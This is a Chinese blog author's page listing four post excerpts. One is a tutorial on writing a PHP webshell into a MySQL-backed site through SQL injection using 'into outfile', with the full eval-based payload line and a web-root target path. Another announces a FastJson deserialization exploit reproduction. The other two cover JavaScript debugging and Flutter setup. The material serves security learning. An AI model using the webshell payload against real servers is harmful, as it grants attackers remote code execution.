- 博客(4)
- 收藏
- 关注
RSS订阅原创 SQL注入MySQL中写入木马getshell的两种方法
SQL注入MySQL中写入木马getshell的两种方法1.利用into outfile直接写入木马文件利用条件:1.知道网站的绝对路径2.secure_file_priv不能为null3.具有写入文件的权限案例:1.利用into outfile写入木马文件select "<?php eval($_POST['cmd']);?>" into outfile "D:\\phpstudy_pro\\WWW\\shell.php"2.利用日志文件写入木马1.开启日志功能set
2021-09-09 16:03:53
4739
1
原创 FastJson反序列化漏洞复现附带多个版本的payload
FastJson<=1.2.68版本反序列化漏洞复现1.漏洞环境搭建2.攻击环境搭建3.攻击步骤4.各个Fastjson版本的payload3.漏洞解析1.漏洞环境搭建打开IDEA,新建一个java web的项目修改HelloServlet.java文件输入一下代码import java.io.*;import javax.servlet.http.*;import javax.servlet.annotation.*;import com.alibaba.fastjson.*;@W
2021-09-03 16:38:05
4285
原创 JavaScript alert,console.log和chrome浏览器调试的区别
JavaScript alert,console.log和chrome浏览器调试的区别alert调试优点:直接弹出代码缺点:alert添加位置和方式有问题可能会导致整个JS文件的错误console.log调试优点:内容更加丰富,有很多调试的内置函数可以调用,使用起来更方便缺点:一些问题出错会出现undefiendchrome浏览器的调试优点:不用再代码中添加语句,省略了一些花费添加代码和删除代码的时间,更加直观,可以一步一步的调试,看哪个代码出了问题。也可以选中代码行,再指定的代码执行。缺
2020-11-25 17:24:05
242
原创 Flutter安装中遇到得问题
Flutter安装中遇到得问题Android toolchain - develop for Android devices (Android SDK version 29.0.3) X Android license status unknown. Try re-installing or updating your Android SDK Manager. See https://developer.android.com/studio/#downloads or visit https://flutt
2020-11-24 16:23:50
640
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人